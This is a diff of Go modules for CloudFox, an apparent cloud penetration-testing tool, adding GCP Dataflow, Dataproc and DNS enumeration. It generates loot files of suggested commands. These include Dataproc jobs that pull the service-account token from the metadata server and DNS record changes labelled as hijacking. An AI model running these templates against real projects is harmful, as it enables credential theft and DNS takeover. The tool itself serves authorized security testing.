jobsToTableBody(jobs []dataflowservice.JobInfo) [][]string { + var body [][]string + for _, job := range jobs { + publicIPs := "No" + if job.UsePublicIPs { + publicIPs = "Yes" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if job.ServiceAccount != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, job.ServiceAccount) + } else { + attackPaths = "No" + } + } + + body = append(body, []string{ + job.ProjectID, + m.GetProjectName(job.ProjectID), + job.Name, + job.Type, + job.State, + job.Location, + job.ServiceAccount, + attackPaths, + publicIPs, + fmt.Sprintf("%d", job.NumWorkers), + }) + } + return body +} + +func (m *DataflowModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, jobs := range m.ProjectJobs { + body := m.jobsToTableBody(jobs) + tableFiles := []internal.TableFile{{Name: "dataflow", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = DataflowOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) + } +} + +func (m *DataflowModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allJobs := m.getAllJobs() + body := m.jobsToTableBody(allJobs) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{Name: "dataflow", Header: m.getTableHeader(), Body: body}} + output := DataflowOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) + } +} diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go new file mode 100644 index 00000000..85e6fbaa --- /dev/null +++ b/gcp/commands/dataproc.go @@ -0,0 +1,412 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + dataprocservice "github.com/BishopFox/cloudfox/gcp/services/dataprocService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDataprocCommand = &cobra.Command{ + Use: globals.GCP_DATAPROC_MODULE_NAME, + Aliases: []string{"dp", "hadoop", "spark"}, + Short: "Enumerate Dataproc clusters", + Long: `Enumerate Dataproc (Hadoop/Spark) clusters. + +Features: +- Lists all Dataproc clusters across regions +- Shows service account configuration +- Identifies public IP exposure +- Checks for Kerberos authentication +- Analyzes security configurations`, + Run: runGCPDataprocCommand, +} + +type DataprocModule struct { + gcpinternal.BaseGCPModule + ProjectClusters map[string][]dataprocservice.ClusterInfo // projectID -> clusters + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper results + mu sync.Mutex +} + +type DataprocOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataprocOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataprocOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPDataprocCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DATAPROC_MODULE_NAME) + if err != nil { + return + } + + module := &DataprocModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectClusters: make(map[string][]dataprocservice.ClusterInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *DataprocModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAPROC_MODULE_NAME, m.processProject) + + allClusters := m.getAllClusters() + if len(allClusters) == 0 { + logger.InfoM("No Dataproc clusters found", globals.GCP_DATAPROC_MODULE_NAME) + return + } + + runningCount := 0 + publicCount := 0 + for _, cluster := range allClusters { + if cluster.State == "RUNNING" { + runningCount++ + } + if !cluster.InternalIPOnly { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Dataproc cluster(s) (%d running, %d with public IPs)", + len(allClusters), runningCount, publicCount), globals.GCP_DATAPROC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *DataprocModule) getAllClusters() []dataprocservice.ClusterInfo { + var all []dataprocservice.ClusterInfo + for _, clusters := range m.ProjectClusters { + all = append(all, clusters...) + } + return all +} + +func (m *DataprocModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Dataproc in project: %s", projectID), globals.GCP_DATAPROC_MODULE_NAME) + } + + svc := dataprocservice.New() + + clusters, err := svc.ListClusters(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAPROC_MODULE_NAME, + fmt.Sprintf("Could not list Dataproc clusters in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectClusters[projectID] = clusters + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["dataproc-commands"] = &internal.LootFile{ + Name: "dataproc-commands", + Contents: "# Dataproc Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, cluster := range clusters { + m.addToLoot(projectID, cluster) + } + m.mu.Unlock() +} + +func (m *DataprocModule) addToLoot(projectID string, cluster dataprocservice.ClusterInfo) { + lootFile := m.LootMap[projectID]["dataproc-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# DATAPROC CLUSTER: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Region: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n"+ + "# Public IPs: %s\n"+ + "# Kerberos: %s\n", + cluster.Name, cluster.ProjectID, cluster.Region, + cluster.State, cluster.ServiceAccount, + shared.BoolToYesNo(!cluster.InternalIPOnly), + shared.BoolToYesNo(cluster.KerberosEnabled), + ) + + if len(cluster.MasterInstanceNames) > 0 { + lootFile.Contents += fmt.Sprintf("# Master Instances: %s\n", strings.Join(cluster.MasterInstanceNames, ", ")) + } + + // === ENUMERATION COMMANDS === + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe cluster: +gcloud dataproc clusters describe %s --region=%s --project=%s + +# List jobs on this cluster: +gcloud dataproc jobs list --cluster=%s --region=%s --project=%s + +# Get cluster IAM policy: +gcloud dataproc clusters get-iam-policy %s --region=%s --project=%s + +# List cluster metadata/properties: +gcloud dataproc clusters describe %s --region=%s --project=%s --format=json | jq '.config.softwareConfig.properties' + +`, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + ) + + // Bucket commands + if cluster.ConfigBucket != "" { + lootFile.Contents += fmt.Sprintf( + "# List config bucket (may contain init scripts with secrets):\n"+ + "gsutil ls -r gs://%s/\n"+ + "# Download init actions (check for hardcoded credentials):\n"+ + "gsutil -m cp -r gs://%s/google-cloud-dataproc-metainfo/ /tmp/dataproc-config-%s/\n\n", + cluster.ConfigBucket, + cluster.ConfigBucket, cluster.Name, + ) + } + if cluster.TempBucket != "" { + lootFile.Contents += fmt.Sprintf( + "# List temp bucket (may contain job output/data):\n"+ + "gsutil ls -r gs://%s/\n\n", + cluster.TempBucket, + ) + } + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // SSH to master node + if len(cluster.MasterInstanceNames) > 0 { + masterName := cluster.MasterInstanceNames[0] + lootFile.Contents += fmt.Sprintf( + "# SSH to master node (runs as cluster SA: %s):\n"+ + "gcloud compute ssh %s --project=%s --zone=ZONE\n\n"+ + "# SSH through IAP (if direct SSH blocked):\n"+ + "gcloud compute ssh %s --tunnel-through-iap --project=%s --zone=ZONE\n\n", + cluster.ServiceAccount, + masterName, cluster.ProjectID, + masterName, cluster.ProjectID, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# SSH to master node:\n"+ + "gcloud compute ssh %s-m --project=%s --zone=ZONE\n\n"+ + "# SSH through IAP (if direct SSH blocked):\n"+ + "gcloud compute ssh %s-m --tunnel-through-iap --project=%s --zone=ZONE\n\n", + cluster.Name, cluster.ProjectID, + cluster.Name, cluster.ProjectID, + ) + } + + // Submit jobs for code execution + lootFile.Contents += fmt.Sprintf( + "# Submit PySpark job for code execution (runs as SA: %s):\n"+ + "cat > /tmp/cloudfox_spark.py << 'SPARKEOF'\n"+ + "import subprocess, json\n"+ + "result = subprocess.run(['curl', '-s', '-H', 'Metadata-Flavor: Google',\n"+ + " 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'],\n"+ + " capture_output=True, text=True)\n"+ + "print(json.loads(result.stdout))\n"+ + "SPARKEOF\n"+ + "gcloud dataproc jobs submit pyspark /tmp/cloudfox_spark.py --cluster=%s --region=%s --project=%s\n\n"+ + "# Submit Spark job:\n"+ + "gcloud dataproc jobs submit spark --cluster=%s --region=%s --project=%s --class=MAIN_CLASS --jars=JAR_PATH\n\n"+ + "# Submit Hive query (access HDFS/HBase data):\n"+ + "gcloud dataproc jobs submit hive --cluster=%s --region=%s --project=%s --execute=\"SHOW DATABASES; SHOW TABLES;\"\n\n"+ + "# Submit Pig job:\n"+ + "gcloud dataproc jobs submit pig --cluster=%s --region=%s --project=%s --execute=\"sh curl -s http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token -H Metadata-Flavor:Google\"\n\n", + cluster.ServiceAccount, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + ) + + // Access web UIs + lootFile.Contents += fmt.Sprintf( + "# Access Hadoop/Spark Web UIs (via SSH tunnel or component gateway):\n"+ + "# YARN ResourceManager: http://:8088\n"+ + "# HDFS NameNode: http://:9870\n"+ + "# Spark History: http://:18080\n"+ + "# Create SSH tunnel to YARN UI:\n"+ + "gcloud compute ssh %s-m --project=%s --zone=ZONE -- -L 8088:localhost:8088 -N\n\n", + cluster.Name, cluster.ProjectID, + ) +} + +func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DataprocModule) getTableHeader() []string { + return []string{ + "Project", + "Name", + "Region", + "State", + "Master", + "Master Instances", + "Workers", + "Service Account", + "SA Attack Paths", + "Public IPs", + "Kerberos", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterInfo) [][]string { + var body [][]string + for _, cluster := range clusters { + sa := cluster.ServiceAccount + if sa == "" { + sa = "(default)" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "(default)" && sa != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + masterConfig := fmt.Sprintf("%s x%d", cluster.MasterMachineType, cluster.MasterCount) + workerConfig := fmt.Sprintf("%s x%d", cluster.WorkerMachineType, cluster.WorkerCount) + + // Master instances + masterInstances := "-" + if len(cluster.MasterInstanceNames) > 0 { + masterInstances = strings.Join(cluster.MasterInstanceNames, ", ") + } + + // If cluster has IAM bindings, create one row per binding + if len(cluster.IAMBindings) > 0 { + for _, binding := range cluster.IAMBindings { + body = append(body, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + masterInstances, + workerConfig, + sa, + attackPaths, + shared.BoolToYesNo(!cluster.InternalIPOnly), + shared.BoolToYesNo(cluster.KerberosEnabled), + binding.Role, + binding.Member, + }) + } + } else { + // Cluster has no IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + masterInstances, + workerConfig, + sa, + attackPaths, + shared.BoolToYesNo(!cluster.InternalIPOnly), + shared.BoolToYesNo(cluster.KerberosEnabled), + "-", + "-", + }) + } + } + return body +} + +func (m *DataprocModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, clusters := range m.ProjectClusters { + body := m.clustersToTableBody(clusters) + tableFiles := []internal.TableFile{{Name: "dataproc-clusters", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = DataprocOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DATAPROC_MODULE_NAME) + } +} + +func (m *DataprocModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allClusters := m.getAllClusters() + body := m.clustersToTableBody(allClusters) + + tables := []internal.TableFile{{Name: "dataproc-clusters", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := DataprocOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAPROC_MODULE_NAME) + } +} diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go new file mode 100644 index 00000000..2172faed --- /dev/null +++ b/gcp/commands/dns.go @@ -0,0 +1,550 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + DNSService "github.com/BishopFox/cloudfox/gcp/services/dnsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDNSCommand = &cobra.Command{ + Use: globals.GCP_DNS_MODULE_NAME, + Aliases: []string{"zones", "cloud-dns"}, + Short: "Enumerate Cloud DNS zones and records with security analysis", + Long: `Enumerate Cloud DNS managed zones and records across projects. + +Features: +- Lists all DNS managed zones (public and private) +- Shows zone configuration (DNSSEC, visibility, peering) +- Enumerates DNS records for each zone +- Identifies interesting records (A, CNAME, TXT, MX) +- Shows private zone VPC bindings +- Generates gcloud commands for DNS management + +Security Columns: +- Visibility: public or private +- DNSSEC: Whether DNSSEC is enabled +- Networks: VPC networks for private zones +- Peering: Cross-project DNS peering + +Attack Surface: +- Public zones expose domain infrastructure +- TXT records may contain sensitive info (SPF, DKIM, verification) +- Private zones indicate internal network structure +- DNS forwarding may expose internal resolvers`, + Run: runGCPDNSCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DNSModule struct { + gcpinternal.BaseGCPModule + + ProjectZones map[string][]DNSService.ZoneInfo // projectID -> zones + ProjectRecords map[string][]DNSService.RecordInfo // projectID -> records + TakeoverRisks []DNSService.TakeoverRisk // kept global for summary + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DNSOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DNSOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DNSOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDNSCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DNS_MODULE_NAME) + if err != nil { + return + } + + module := &DNSModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectZones: make(map[string][]DNSService.ZoneInfo), + ProjectRecords: make(map[string][]DNSService.RecordInfo), + TakeoverRisks: []DNSService.TakeoverRisk{}, + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DNS_MODULE_NAME, m.processProject) + + allZones := m.getAllZones() + allRecords := m.getAllRecords() + + if len(allZones) == 0 { + logger.InfoM("No DNS zones found", globals.GCP_DNS_MODULE_NAME) + return + } + + // Count zone types and security issues + publicCount := 0 + privateCount := 0 + transferModeCount := 0 + dnssecOffCount := 0 + + for _, zone := range allZones { + if zone.Visibility == "public" { + publicCount++ + // Check DNSSEC status for public zones + if zone.DNSSECState == "" || zone.DNSSECState == "off" { + dnssecOffCount++ + } else if zone.DNSSECState == "transfer" { + transferModeCount++ + } + } else { + privateCount++ + } + } + + // Check for subdomain takeover risks + ds := DNSService.New() + m.TakeoverRisks = ds.CheckTakeoverRisks(allRecords) + + msg := fmt.Sprintf("Found %d zone(s), %d record(s)", len(allZones), len(allRecords)) + if publicCount > 0 { + msg += fmt.Sprintf(" [%d public]", publicCount) + } + if privateCount > 0 { + msg += fmt.Sprintf(" [%d private]", privateCount) + } + logger.SuccessM(msg, globals.GCP_DNS_MODULE_NAME) + + // Log security warnings + if dnssecOffCount > 0 { + logger.InfoM(fmt.Sprintf("[SECURITY] %d public zone(s) have DNSSEC disabled", dnssecOffCount), globals.GCP_DNS_MODULE_NAME) + } + if transferModeCount > 0 { + logger.InfoM(fmt.Sprintf("[SECURITY] %d zone(s) in DNSSEC transfer mode (vulnerable during migration)", transferModeCount), globals.GCP_DNS_MODULE_NAME) + } + if len(m.TakeoverRisks) > 0 { + logger.InfoM(fmt.Sprintf("[SECURITY] %d potential subdomain takeover risk(s) detected", len(m.TakeoverRisks)), globals.GCP_DNS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// getAllZones returns all zones from all projects +func (m *DNSModule) getAllZones() []DNSService.ZoneInfo { + var all []DNSService.ZoneInfo + for _, zones := range m.ProjectZones { + all = append(all, zones...) + } + return all +} + +// getAllRecords returns all records from all projects +func (m *DNSModule) getAllRecords() []DNSService.RecordInfo { + var all []DNSService.RecordInfo + for _, records := range m.ProjectRecords { + all = append(all, records...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DNSModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating DNS in project: %s", projectID), globals.GCP_DNS_MODULE_NAME) + } + + ds := DNSService.New() + + // Get zones + zones, err := ds.Zones(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DNS_MODULE_NAME, + fmt.Sprintf("Could not enumerate DNS zones in project %s", projectID)) + return + } + + var projectRecords []DNSService.RecordInfo + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["dns-commands"] = &internal.LootFile{ + Name: "dns-commands", + Contents: "# Cloud DNS Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + for _, zone := range zones { + m.mu.Lock() + m.addZoneToLoot(projectID, zone) + m.mu.Unlock() + + // Get records for each zone (outside of lock to avoid holding mutex across API call) + records, err := ds.Records(projectID, zone.Name) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DNS_MODULE_NAME, + fmt.Sprintf("Could not enumerate DNS records in zone %s", zone.Name)) + continue + } + + projectRecords = append(projectRecords, records...) + } + + m.mu.Lock() + m.ProjectZones[projectID] = zones + m.ProjectRecords[projectID] = projectRecords + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d zone(s) in project %s", len(zones), projectID), globals.GCP_DNS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DNSModule) addZoneToLoot(projectID string, zone DNSService.ZoneInfo) { + lootFile := m.LootMap[projectID]["dns-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# DNS ZONE: %s (%s)\n"+ + "# =============================================================================\n"+ + "# Project: %s, Visibility: %s\n", + zone.Name, zone.DNSName, + zone.ProjectID, zone.Visibility, + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe zone: +gcloud dns managed-zones describe %s --project=%s + +# List all record sets: +gcloud dns record-sets list --zone=%s --project=%s + +# Export all records (for offline analysis): +gcloud dns record-sets export /tmp/dns-%s.zone --zone=%s --project=%s + +# List DNSSEC config: +gcloud dns managed-zones describe %s --project=%s --format=json | jq '.dnssecConfig' + +`, zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + zone.Name, zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + ) + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // DNS validation and takeover checks + lootFile.Contents += fmt.Sprintf( + "# Validate DNS resolution for the zone:\n"+ + "dig %s ANY +short\n"+ + "nslookup %s\n\n"+ + "# Check for dangling CNAME records (subdomain takeover):\n"+ + "gcloud dns record-sets list --zone=%s --project=%s --filter=\"type=CNAME\" --format=\"table(name,rrdatas)\"\n\n"+ + "# Test each CNAME for dangling records:\n"+ + "# for cname in $(gcloud dns record-sets list --zone=%s --project=%s --filter=\"type=CNAME\" --format=\"value(rrdatas)\"); do\n"+ + "# echo -n \"$cname: \"; dig +short $cname || echo \"DANGLING - potential takeover!\"\n"+ + "# done\n\n"+ + "# Check NS records (for delegation attacks):\n"+ + "dig %s NS +short\n\n", + zone.DNSName, zone.DNSName, + zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + zone.DNSName, + ) + + // Zone modification commands + lootFile.Contents += fmt.Sprintf( + "# Add a DNS record (requires dns.changes.create):\n"+ + "gcloud dns record-sets create test.%s --zone=%s --type=A --ttl=300 --rrdatas=YOUR_IP --project=%s\n\n"+ + "# Modify existing record (DNS hijacking):\n"+ + "gcloud dns record-sets update www.%s --zone=%s --type=A --ttl=300 --rrdatas=YOUR_IP --project=%s\n\n", + zone.DNSName, zone.Name, zone.ProjectID, + zone.DNSName, zone.Name, zone.ProjectID, + ) + + if zone.Visibility == "public" { + lootFile.Contents += "# [FINDING] This is a PUBLIC zone - records are resolvable from the internet\n\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DNSModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getZonesHeader returns the header for the zones table +func (m *DNSModule) getZonesHeader() []string { + return []string{ + "Project", + "Zone Name", + "DNS Name", + "Visibility", + "DNSSEC", + "Security", + "Networks/Peering", + "Forwarding", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +// getRecordsHeader returns the header for the records table +func (m *DNSModule) getRecordsHeader() []string { + return []string{ + "Zone", + "Name", + "Type", + "TTL", + "Data", + "Takeover Risk", + } +} + +// zonesToTableBody converts zones to table body rows +func (m *DNSModule) zonesToTableBody(zones []DNSService.ZoneInfo) [][]string { + var body [][]string + for _, zone := range zones { + dnssec := zone.DNSSECState + if dnssec == "" { + dnssec = "off" + } + + security := "-" + if zone.Visibility == "public" { + if zone.DNSSECState == "" || zone.DNSSECState == "off" { + security = "DNSSEC Disabled" + } else if zone.DNSSECState == "transfer" { + security = "Transfer Mode (Vulnerable)" + } else if zone.DNSSECState == "on" { + security = "OK" + } + } + + networkInfo := "-" + if len(zone.PrivateNetworks) > 0 { + networkInfo = strings.Join(zone.PrivateNetworks, ", ") + } else if zone.PeeringNetwork != "" { + networkInfo = fmt.Sprintf("Peering: %s", zone.PeeringNetwork) + if zone.PeeringTargetProject != "" { + networkInfo += fmt.Sprintf(" (%s)", zone.PeeringTargetProject) + } + } + + forwarding := "-" + if len(zone.ForwardingTargets) > 0 { + forwarding = strings.Join(zone.ForwardingTargets, ", ") + } + + if len(zone.IAMBindings) > 0 { + for _, binding := range zone.IAMBindings { + body = append(body, []string{ + m.GetProjectName(zone.ProjectID), zone.Name, zone.DNSName, + zone.Visibility, dnssec, security, networkInfo, forwarding, binding.Role, binding.Member, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(zone.ProjectID), zone.Name, zone.DNSName, + zone.Visibility, dnssec, security, networkInfo, forwarding, "-", "-", + }) + } + } + return body +} + +// recordsToTableBody converts records to table body rows +func (m *DNSModule) recordsToTableBody(records []DNSService.RecordInfo) [][]string { + takeoverRiskMap := make(map[string]DNSService.TakeoverRisk) + for _, risk := range m.TakeoverRisks { + takeoverRiskMap[risk.RecordName] = risk + } + + var body [][]string + interestingTypes := map[string]bool{"A": true, "AAAA": true, "CNAME": true, "MX": true, "TXT": true, "SRV": true} + for _, record := range records { + if !interestingTypes[record.Type] { + continue + } + + data := strings.Join(record.RRDatas, ", ") + takeoverRisk := "-" + if risk, exists := takeoverRiskMap[record.Name]; exists { + takeoverRisk = fmt.Sprintf("%s (%s)", risk.RiskLevel, risk.Service) + } + + body = append(body, []string{ + record.ZoneName, record.Name, record.Type, fmt.Sprintf("%d", record.TTL), data, takeoverRisk, + }) + } + return body +} + +// buildTablesForProject builds table files for a single project +func (m *DNSModule) buildTablesForProject(projectID string) []internal.TableFile { + zones := m.ProjectZones[projectID] + records := m.ProjectRecords[projectID] + + zonesBody := m.zonesToTableBody(zones) + recordsBody := m.recordsToTableBody(records) + + var tableFiles []internal.TableFile + if len(zonesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-zones", + Header: m.getZonesHeader(), + Body: zonesBody, + }) + } + if len(recordsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-records", + Header: m.getRecordsHeader(), + Body: recordsBody, + }) + } + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *DNSModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectZones { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectRecords { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = DNSOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), 